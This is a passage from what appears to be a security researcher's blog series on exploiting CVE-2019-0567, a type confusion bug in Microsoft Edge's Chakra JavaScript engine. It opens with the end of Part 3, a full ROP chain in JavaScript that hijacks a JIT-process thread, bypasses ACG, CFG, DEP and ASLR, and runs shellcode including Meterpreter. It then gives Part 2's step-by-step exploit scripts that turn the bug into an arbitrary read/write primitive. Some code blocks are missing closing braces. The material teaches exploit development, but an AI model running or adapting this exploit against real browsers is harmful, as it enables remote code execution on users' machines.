    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x20)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	// SetThreadContext() ROP chain
    // Stage 10 -> Update our remote thread's RIP to return execution into our VirtualProtect ROP chain

    // HANDLE hThread (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)

    // const CONTEXT *lpContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

    // Call KERNELBASE!SetThreadContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x7aa0, kernelbaseHigh); // KERNELBASE!SetThreadContext address 
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!SetThreadContext)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!SetThreadContext - 0x180243949: add rsp, 0x38 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

    // ResumeThread() ROP chain
    // Stage 11 -> Resume the thread, with RIP now pointing to a return into our ROP chain

    // HANDLE hThread (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)

    // Call KERNELBASE!ResumeThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x70a50, kernelbaseHigh); // KERNELBASE!ResumeThread address 
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!ResumeThread)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!ResumeThread - 0x180243949: add rsp, 0x38 ; ret
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);

Let’s start by setting a breakpoint on a jmp rax gadget to reach our SetThreadContext call.

The first parameter we will deal with is the handle to the remote thread we have within the JIT process.

This brings our calls to the following states:

	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)

The next parameter we will set is the pointer to our updated CONTEXT structure.

We then can get SetThreadContext into RAX and call it. The call should be in the following state:

	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)		// The updated CONTEXT structure

We then can execute our SetThreadContext call and hit our first ResumeThread gadget.

ResumeThread only has one parameter, so we will fill it and set up RAX BUT WE WILL NOT YET EXECUTE THE CALL!

	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)

Before we execute ResumeThread, we now need to attach another WinDbg instance to the JIT process. We will set a breakpoint on our ret gadget and see if we successfully control the remote thread!

Coming back to the content process, we can hit pt to execute our call to ResumeThread, which should kick off execution of our remote thread within the JIT process!

Going back to the JIT process, we can see our breakpoint was hit and our ROP chain is on the stack! We have gained code execution in the JIT process!

Our last step will be to walk through our VirtualProtect ROP chain, which should mark our shellcode as RWX. Here is how the call should look:

	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	PAGE_EXECUTE_READWRITE,				// We want our shellcode to be RWX
	addressof(data_address) 			// Any writable address

Executing the ret gadget, we hit our first ROP gadgets which setup the lpflOldProtect parameter, which is any address that is writable

We are now here:

	addressof(data_address) 			// Any writable address

The next parameter we will address is the lpAddress parameter - which is the address of our shellcode (the page we want to mark as RWX)

We are now here:

	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	addressof(data_address) 			// Any writable address

Next up is dwSize, which we set to 0x1000.

We are now here:

	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	addressof(data_address) 			// Any writable address

The last parameter is our page protection, which is PAGE_EXECUTE_READWRITE.

We are now all setup!

	addressof(shellcode),				// The address of our already injected shellcode (we want this to be marked as RWX)
	sizeof(shellcode),				// The size of the memory we want to mark as RWX
	PAGE_EXECUTE_READWRITE,				// We want our shellcode to be RWX
	addressof(data_address) 			// Any writable address

After executing the function call, we have marked our shellcode as RWX! We have successfully bypassed Arbitrary Code Guard and have generated dynamic RWX memory!

The last thing for us is to ensure execution reaches our shellcode. After executing the VirtualProtect function, let’s see if we hit the last part of our ROP chain - which should push our shellcode address onto the stack, and return into it.

That’s it! We have achieved our task and we now can execute our shellcode!

An exploit GIF shall suit us nicely here!

Meterpreter is also loaded as a reflective, in memory DLL - meaning we have also taken care of CIG as well! That makes for DEP, ASLR, CFG, ACG, CIG, and no-child process mitigation bypasses! No wonder this post was so long!


This was an extremely challenging and rewarding task. Browser exploitation has been a thorn in my side for a long time, and I am very glad I now understand the basics. I do not yet know what is in my future, but if it is close to this level of complexity (I, at least, thought it was complex) I should be in for a treat! It is 4 a.m., so I am signing off now. Here is the final exploit on my GitHub.

Peace, love, and positivity :-)

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 2)

16 March 2022 at 00:00


In part one we went over setting up a ChakraCore exploit development environment, understanding how JavaScript (more specifically, the Chakra/ChakraCore engine) manages dynamic objects in memory, and vulnerability analysis of CVE-2019-0567 - a type confusion vulnerability that affects Chakra-based Microsoft Edge and ChakraCore. In this post, part two, we will pick up where we left off and begin by taking our proof-of-concept script, which β€œcrashes” Edge and ChakraCore as a result of the type confusion vulnerability, and convert it into a read/write primitive. This primitive will then be used to gain code execution against ChakraCore and the ChakraCore shell, ch.exe, which essentially is a command-line JavaScript shell that allows execution of JavaScript. For our purposes, we can think of ch.exe as Microsoft Edge, but without the visuals. Then, in part three, we will port our exploit to Microsoft Edge to gain full code execution.

This post will also be dealing with ASLR, DEP, and Control Flow Guard (CFG) exploit mitigations. As we will see in part three, when we port our exploit to Edge, we will also have to deal with Arbitrary Code Guard (ACG). However, this mitigation isn’t enabled within ChakraCore - so we won’t have to deal with it within this blog post.

Lastly, before beginning this portion of the blog series, much of what is used in this blog post comes from Bruno Keith’s amazing work on this subject, as well as the Perception Point blog post on the β€œsister” vulnerability to CVE-2019-0567. With that being said, let’s go ahead and jump right into it!

ChakraCore/Chakra Exploit Primitives

Let’s recall the memory layout, from part one, of our dynamic object after the type confusion occurs.

As we can see above, we have overwritten the auxSlots pointer with a value we control, of 0x1234. Additionally, recall from part one of this blog series when we talked about JavaScript objects. A value in JavaScript is 64-bits (technically), but only 32-bits are used to hold the actual value (in the case of 0x1234, the value is represented in memory as 001000000001234. This is a result of β€œNaN boxing”, where JavaScript encodes type information in the upper 17-bits of the value. We also know that anything that isn’t a static object (generally speaking) is a dynamic object. We know that dynamic objects are β€œthe exception to the rule”, and are actually represented in memory as a pointer. We saw this in part one by dissecting how dynamic objects are laid out in memory (e.g. object points to | vtable | type | auxSlots |).

What this means for our vulnerability is that we can overwrite the auxSlots pointer currently, but we can only overwrite it with a value that is NaN-boxed, meaning we can’t hijack the object with anything particularly interesting, as we are on a 64-bit machine but we can only overwrite the auxSlots pointer with a 32-bit value in our case, when using something like 0x1234.

The above is only a half truth, as we can use some β€œhacks” to actually end up controlling this auxSlots pointer with something interesting, actually with a β€œchain” of interesting items, to force ChakraCore to do something nefarious - which will eventually lead us to code execution.

Let’s update our proof-of-concept, which we will save as exploit.js, with the following JavaScript:

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);		// Instead of supplying 0x1234, we are supplying our obj


Our exploit.js is slightly different than our original proof-of-concept. When the type confusion is exploited, we now are supplying obj instead of a value of 0x1234. In not so many words, the auxSlots pointer of our o object, previously overwritten with 0x1234 in part one, will now be overwritten with the address of our obj object. Here is where this gets interesting.

Recall that any object that isn’t NaN-boxed is considered a pointer. Since obj is a dynamic object, it is represented in memory as such:

What this means is that instead of our corrupted o object after the type confusion being laid out as such:

It will actually look like this in memory:

Our o object, who’s auxSlots pointer we can corrupt, now technically has a valid pointer in the auxSlots location within the object. However, we can clearly see that the o->auxSlots pointer isn’t pointing to an array of properties, it is actually pointing to the obj object which we created! Our exploit.js script essentially updates o->auxSlots to o->auxSlots = addressof(obj). This essentially means that o->auxSlots now contains the memory address of the obj object, instead of a valid auxSlots array address.

Recall also that we control the o properties, and can call them at any point in exploit.js via o.a, o.b, etc. For instance, if there was no type confusion vulnerability, and if we wanted to fetch the o.a property, we know this is how it would be done (considering o had been type transitioned to an auxSlots setup):

We know this to be the case, as we are well aware ChakraCore will dereference dynamic_object+0x10 to pull the auxSlots pointer. After retrieving the auxSlots pointer, ChakraCore will add the appropriate index to the auxSlots address to fetch a given property, such as o.a, which is stored at offset 0 or o.b, which is stored at offset 0x8. We saw this in part one of this blog series, and this is no different than how any other array stores and fetches an appropriate index.

What’s most interesting about all of this is that ChakraCore will still act on our o object as if the auxSlots pointer is still valid and hasn’t been corrupted. After all, this was the root cause of our vulnerability in part one. When we acted on o.a, after corrupting auxSlots to 0x1234, an access violation occurred, as 0x1234 is invalid memory.

This time, however, we have provided valid memory within o->auxSlots. So acting on o.a would actually take address is stored at auxSlots, dereference it, and then return the value stored at offset 0. Doing this currently, with our obj object being supplied as the auxSlots pointer for our corrupted o object, will actually return the vftable from our obj object. This is because the first 0x10 bytes of a dynamic object contain metadata, like vftable and type. Since ChakraCore is treating our obj as an auxSlots array, which can be indexed directly at an offset of 0, via auxSlots[0], we can actually interact with this metadata. This can be seen below.

Usually we can expect that the dereferenced contents of o+0x10, a.k.a. auxSlots, at an offset of 0, to contain the actual, raw value of o.a. After the type confusion vulnerability is used to corrupt auxSlots with a different address (the address of obj), whatever is stored at this address, at an offset of 0, is dereferenced and returned to whatever part of the JavaScript code is trying to retrieve the value of o.a. Since we have corrupted auxSlots with the address of an object, ChakraCore doesn’t know auxSlots is gone, and it will still gladly index whatever is at auxSlots[0] when the script tries to access the first property (in this case o.a), which is the vftable of our obj object. If we retrieved o.b, after our type confusion was executed, ChakraCore would fetch the type pointer.

Let’s inspect this in the debugger, to make more sense of this. Do not worry if this has yet to make sense. Recall from part one, the function chakracore!Js::DynamicTypeHandler::AdjustSlots is responsible for the type transition of our o property. Let’s set a breakpoint on our print() statement, as well as the aforementioned function so that we can examine the call stack to find the machine code (the JIT’d code) which corresponds to our opt() function. This is all information we learned in part one.

After opening ch.exe and passing in exploit.js as the argument (the script to be executed), we set a breakpoint on ch!WScriptJsrt::EchoCallback. After resuming execution and hitting the breakpoint, we then can set our intended breakpoint of chakracore!Js::DynamicTypeHandler::AdjustSlots.

When the chakracore!Js::DynamicTypeHandler::AdjustSlots is hit, we can examine the callstack (just like in part one) to identify our β€œJIT’d” opt() function

After retrieving the address of our opt() function, we can unassemble the code to set a breakpoint where our type confusion vulnerability reaches the apex - on the mov qword ptr [r15+10h], r11 instruction when auxSlots is overwritten.

We know that auxSlots is stored at o+0x10, so this means our o object is currently in R15. Let’s examine the object’s layout in memory, currently.

We can clearly see that this is the o object. Looking at the R11 register, which is the value that is going to corrupt auxSlots of o, we can see that it is the obj object we created earlier.

Notice what happens to the o object, as our vulnerability manifests. When o->auxSlots is corrupted, o.a now refers to the vftable property of our obj object.

Anytime we act on o.a, we will now be acting on the vftable of obj! This is great, but how can we take this further? Take note that the vftable is actually a user-mode address that resides within chakracore.dll. This means, if we were able to leak a vftable from an object, we would bypass ASLR. Let’s see how we can possibly do this.

DataView Objects

A popular object leveraged for exploitation is a DataView object. A DataView object provides users a way to read/write multiple different data types and endianness to and from a raw buffer in memory, which can be created with ArrayBuffer. This can include writing or retrieving an 8-byte, 16-byte, 32-byte, or (in some browsers) 64-bytes of raw data from said buffer. More information about DataView objects can be found here, for the more interested reader.

At a higher level a DataView object provides a set of methods that allow a developer to be very specific about the kind of data they would like to set, or retrieve, in a buffer created by ArrayBuffer. For instance, with the method getUint32(), provided by DataView, we can tell ChakraCore that we would like to retrieve the contents of the ArrayBuffer backing the DataView object as a 32-bit, unsigned data type, and even go as far as asking ChakraCore to return the value in little-endian format, and even specifying a specific offset within the buffer to read from. A list of methods provided by DataView can be found here.

The previous information provided makes a DataView object extremely attractive, from an exploitation perspective, as not only can we set and read data from a given buffer, we can specify the data type, offset, and even endianness. More on this in a bit.

Moving on, a DataView object could be instantiated as such below:

dataviewObj = new DataView(new ArrayBuffer(0x100));

This would essentially create a DataView object that is backed by a buffer, via ArrayBuffer.

This matters greatly to us because as of now if we want to overwrite auxSlots with something (referring to our vulnerability), it would either have to be a raw JavaScript value, like an integer, or the address of a dynamic object like the obj used previously. Even if we had some primitive to leak the base address of kernel32.dll, for instance, we could never actually corrupt the auxSlots pointer by directly overwriting it with the leaked address of 0x7fff5b3d0000 for instance, via our vulnerability. This is because of NaN-boxing - meaning if we try to directly overwrite the auxSlots pointer so that we can arbitrarily read or write from this address, ChakraCore would still β€œtag” this value, which would β€œmangle it” so that it no longer is represented in memory as 0x7fff5b3d0000. We can clearly see this if we first update exploit.js to the following and pause execution when auxSlots is corrupted:

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, 0x7fff5b3d0000);		// Instead of supplying 0x1234 or a fake object address, supply the base address of kernel32.dll

Using the same breakpoints and method for debugging, shown in the beginning of this blog, we can locate the JIT’d address of the opt() function and pause execution on the instruction responsible for overwriting auxSlots of the o object (in this case mov qword ptr [r15+10h], r13.

Notice how the value we supplied, originally 0x7fff5b3d0000 and was placed into the R13 register, has been totally mangled. This is because ChakraCore is embedding type information into the upper 17-bits of the 64-bit value (where only 32-bits technically are available to store a raw value). Obviously seeing this, we can’t directly set values for exploitation, as we need to be able to set and write 64-bit values at a time since we are exploiting a 64-bit system without having the address/value mangled. This means even if we can reliably leak data, we can’t write this leaked data to memory, as we have no way to avoid JavaScript NaN-boxing the value. This leaves us with the following choices:

  1. Write a NaN-boxed value to memory
  2. Write a dynamic object to memory (which is represented by a pointer)

If we chain together a few JavaScript objects, we can use the latter option shown above to corrupt a few things in memory with the addresses of objects to achieve a read/write primitive. Let’s start this process by examining how DataView objects behave in memory.

Let’s create a new JavaScript script named dataview.js:

// print() debug

// Create a DataView object
dataviewObj = new DataView(new ArrayBuffer(0x100));

// Set data in the buffer
dataviewObj.setUint32(0x0, 0x41414141, true);	// Set, at an offset of 0 in the buffer, the value 0x41414141 and specify little-endian (true)

Notice the level of control we have in respect to the amount of data, the type of data, and the offset of the data in the buffer we can set/retrieve.

In the above code we created a DataView object, which is backed by a raw memory buffer via ArrayBuffer. With the DataView β€œview” of this buffer, we can tell ChakraCore to start at the beginning of the buffer, use a 32-bit, unsigned data type, and use little endian format when setting the data 0x41414141 into the buffer created by ArrayBuffer. To see this in action, let’s execute this script in WinDbg.

Next, let’s set our print() debug breakpoint on ch!WScriptJsrt::EchoCallback. After resuming execution, let’s then set a breakpoint on chakracore!Js::DataView::EntrySetUint32, which is responsible for setting a value on a DataView buffer. Please note I was able to find this function by searching the ChakraCore code base, which is open-sourced and available on GitHub, within DataView.cpp, which looked to be responsible for setting values on DataView objects.

After hitting the breakpoint on chakracore!Js::DataView::EntrySetUint32, we can look further into the disassembly to see a method provided by DataView called SetValue(). Let’s set a breakpoint here.

After hitting the breakpoint, we can view the disassembly of this function below. We can see another call to a method called SetValue(). Let’s set a breakpoint on this function (please right click and open the below image in a new tab if you have trouble viewing).

After hitting the breakpoint, we can see the source of the SetValue() method function we are currently in, outlined in red below.

Cross-referencing this with the disassembly, we noticed right before the ret from this method function we see a mov dword ptr [rax], ecx instruction. This is an assembly operation which uses a 32-bit value to act on a 64-bit value. This is likely the operation which writes our 32-bit value to the buffer of the DataView object. We can confirm this by setting a breakpoint and verifying that, in fact, this is the responsible instruction.

We can see our buffer now holds 0x41414141.

This verifies that it is possible to set an arbitrary 32-bit value without any sort of NaN-boxing, via DataView objects. Also note the address of the buffer property of the DataView object, 0x157af16b2d0. However, what about a 64-bit value? Consider the following script below, which attempts to set one 64-bit value via offsets of DataView.

// print() debug

// Create a DataView object
dataviewObj = new DataView(new ArrayBuffer(0x100));

// Set data in the buffer
dataviewObj.setUint32(0x0, 0x41414141, true);	// Set, at an offset of 0 in the buffer, the value 0x41414141 and specify little-endian (true)
dataviewObj.setUint32(0x4, 0x41414141, true);	// Set, at an offset of 4 in the buffer, the value 0x41414141 and specify little-endian (true)

Using the exact same methodology as before, we can return to our mov dword ptr [rax], rcx instruction which writes our data to a buffer to see that using DataView objects it is possible to set a value in JavaScript as a contiguous 64-bit value without NaN-boxing and without being restricted to just a JavaScript object address!

The only thing we are β€œlimited” to is the fact we cannot set a 64-bit value in β€œone go”, and we must divide our writes/reads into two tries, since we can only read/write 32-bits at a time as a result of the methods provided to use by DataView. However, there is currently no way for us to abuse this functionality, as we can only perform these actions inside a buffer of a DataView object, which is not a security vulnerability. We will eventually see how we can use our type confusion vulnerability to achieve this, later in this blog post.

Lastly, we know how we can act on the DataView object, but how do we actually view the object in memory? Where does the buffer property of DataView come from, as we saw from our debugging? We can set a breakpoint on our original function, chakracore!Js::DataView::EntrySetUint32. When we hit this breakpoint, we then can set a breakpoint on the SetValue() function, at the end of the EntrySetUint32 function, which passes the pointer to the in-scope DataView object via RCX.

If we examine this value in WinDbg, we can clearly see this is our DataView object. Notice the object layout below - this is a dynamic object, but since it is a builtin JavaScript type, the layout is slightly different.

The most important thing for us to note is twofold: the vftable pointer still exists at the beginning of the object, and at offset 0x38 of the DataView object we have a pointer to the buffer. We can confirm this by setting a hardware breakpoint to pause execution anytime DataView.buffer is written to in a 4-byte (32-bit) boundary.

We now know where in a DataView object the buffer is stored, and can confirm how this buffer is written to, and in what manners can it be written to.

Let’s now chain this knowledge together with what we have previously accomplished to gain a read/write primitive.

Read/Write Primitive

Building upon our knowledge of DataView objects from the β€œDataView Objects” section and armed with our knowledge from the β€œChakra/ChakraCore Exploit Primitives” section, where we saw how it would be possible to control the auxSlots pointer with an address of another JavaScript object we control in memory, let’s see how we can put these two together in order to achieve a read/write primitive.

Let’s recall two previous images, where we corrupted our o object’s auxSlots pointer with the address of another object, obj, in memory.

From the above images, we can see our current layout in memory, where o.a now controls the vftable of the obj object and o.b controls the type pointer of the obj object. But what if we had a property c within o (o.c)?

From the above image, we can clearly see that if there was a property c of o (o.c), it would therefore control the auxSlots pointer of the obj object, after the type confusion vulnerability. This essentially means that we can force obj to point to something else in memory. This is exactly what we would like to do in our case. We would like to do the exact same thing we did with the o object (corrupting the auxSlots pointer to point to another object in memory that we control). Here is how we would like this to look.

By setting o.c to a DataView object, we can control the entire contents of the DataView object by acting on the obj object! This is identical to the exact same scenario shown above where the auxSlots pointer was overwritten with the address of another object, but we saw we could fully control that object (vftable and all metadata) by acting on the corrupted object! This is because ChakraCore, again, still treats auxSlots as though it hasn’t been overwritten with another value. When we try to access obj.a in this case, ChakraCore fetches the auxSlots pointer stored at obj+0x10 and then tries to index that memory at an offset of 0. Since that is now another object in memory (in this case a DataView object), obj.a will still gladly fetch whatever is stored at an offset of 0, which is the vftable for our DataView object! This is also the reason we declared obj with so many values, as a DataView object has a few more hidden properties than a standard dynamic object. By declaring obj with many properties, it allows us access to all of the needed properties of the DataView object, since we aren’t stopping at dataview+0x10, like we have been with other objects since we only cared about the auxSlots pointers in those cases.

This is where things really start to pick up. We know that DataView.buffer is stored as a pointer. This can clearly be seen below by our previous investigative work on understanding DataView objects.

In the above image, we can see that DataView.buffer is stored at an offset of 0x38 within the DataView object. In the previous image, the buffer is a pointer in memory which points to the memory address 0x1a239afb2d0. This is the address of our buffer. Anytime we do dataview.setUint32() on our DataView object, this address will be updated with the contents. This can be seen below.

Knowing this, what if we were able to go from this:

To this:

What this would mean is that buffer address, previously shown above, would be corrupted with the base address of kernel32.dll. This means anytime we acted on our DataView object with a method such as setUint32() we would actually be overwriting the contents of kernel32.dll (note that there are obviously parts of a DLL that are read-only, read/write, or read/execute)! This is also known as an arbitrary write primitive! If we have the ability to leak data, we can obviously use our DataView object with the builtin methods to read and write from the corrupted buffer pointer, and we can obviously use our type confusion (as we have done by corrupted auxSlots pointers so far) to corrupt this buffer pointer with whatever memory address we want! The issue that remains, however, is the NaN-boxing dilemma.

As we can see in the above image, we can overwrite the buffer pointer of a DataView object by using the obj.h property. However, as we saw in JavaScript, if we try to set a value on an object such as obj.h = kernel32_base_address, our value will remain mangled. The only way we can get around this is through our DataView object, which can write raw 64-bit values.

The way we will actually address the above issue is to leverage two DataView objects! Here is how this will look in memory.

The above image may look confusing, so let’s break this down and also examine what we are seeing in the debugger.

This memory layout is no different than the others we have discussed. There is a type confusion vulnerability where the auxSlots pointer for our o object is actually the address of an obj object we control in memory. ChakraCore interprets this object as an auxSlots pointer, and we can use property o.c, which would be the third index into the auxSlots array had it not been corrupted. This entry in the auxSlots array is stored at auxSlots+0x10, and since auxSlots is really another object, this allows us to overwrite the auxSlots pointer of the obj object with a JavaScript object.

We overwrite the auxSlots array of the obj object we created, which has many properties. This is because obj->auxSlots was overwritten with a DataView object, which has many hidden properties, including a buffer property. Having obj declared with so many properties allows us to overwrite said hidden properties, such as the buffer pointer, which is stored at an offset of 0x38 within a DataView object. Since dataview1 is being interpreted as an auxSlots pointer, we can use obj (which previously would have been stored in this array) to have full access to overwrite any of the hidden properties of the dataview1 object. We want to set this buffer to an address we want to arbitrarily write to (like the stack for instance, to invoke a ROP chain). However, since JavaScript prevents us from setting obj.h with a raw 64-bit address, due to NaN-boxing, we have to overwrite this buffer with another JavaScript object address. Since DataView objects expose methods that can allow us to write a raw 64-bit value, we overwrite the buffer of the dataview1 object with the address of another DataView object.

Again, we opt for this method because we know obj.h is the property we could update which would overwrite dataview1->buffer. However, JavaScript won’t let us set a raw 64-bit value which we can use to read/write memory from to bypass ASLR and write to the stack and hijack control-flow. Because of this, we overwrite it with another DataView object.

Because dataview1->buffer = dataview2, we can now use the methods exposed by DataView (via our dataview1 object) to write to the dataview2 object’s buffer property with a raw 64-bit address! This is because methods like setUint32(), which we previously saw, allow us to do so! We also know that buffer is stored at an offset of 0x38 within a DataView object, so if we execute the following JavaScript, we can update dataview2->buffer to whatever raw 64-bit value we want to read/write from:

// Recall we can only set 32-bits at a time
// Start with 0x38 (dataview2->buffer and write 4 bytes
dataview1.setUint32(0x38, 0x41414141, true);		// Overwrite dataview2->buffer with 0x41414141

// Overwrite the next 4 bytes (0x3C offset into dataview2) to fully corrupt bytes 0x38-0x40 (the pointer for dataview2->buffer)
dataview1.setUint32(0x3C, 0x41414141, true);		// Overwrite dataview2->buffer with 0x41414141

Now dataview2->buffer would be overwritten with 0x4141414141414141. Let’s consider the following code now:

dataview2.setUint32(0x0, 0x42424242, true);
dataview2.setUint32(0x4, 0x42424242, true);

If we invoke setUint32() on dataview2, we do so at an offset of 0. This is because we are not attempting to corrupt any other objects, we are intending to use dataview2.setUint32() in a legitimate fashion. When dataview2->setUint32() is invoked, it will fetch the address of the buffer from dataview2 by locating dataview2+0x38, dereferencing the address, and attempting to write the value 0x4242424242424242 (as seen above) into the address.

The issue is, however, is that we used a type confusion vulnerability to update dataview2->buffer to a different address (in this case an invalid address of 0x4141414141414141). This is the address dataview2 will now attempt to write to, which obviously will cause an access violation.

Let’s do a test run of an arbitrary write primitive to overwrite the first 8 bytes of the .data section of kernel32.dll (which is writable) to see this in action. To do so, let’s update our exploit.js script to the following:

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    // Print debug statement

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // Set dataview2->buffer to kernel32.dll .data section (which is writable)
    dataview1.setUint32(0x38, 0x5b3d0000+0xa4000, true);
    dataview1.setUint32(0x3C, 0x00007fff, true);

    // Overwrite kernel32.dll's .data section's first 8 bytes with 0x4141414141414141
    dataview2.setUint32(0x0, 0x41414141, true);
    dataview2.setUint32(0x4, 0x41414141, true);


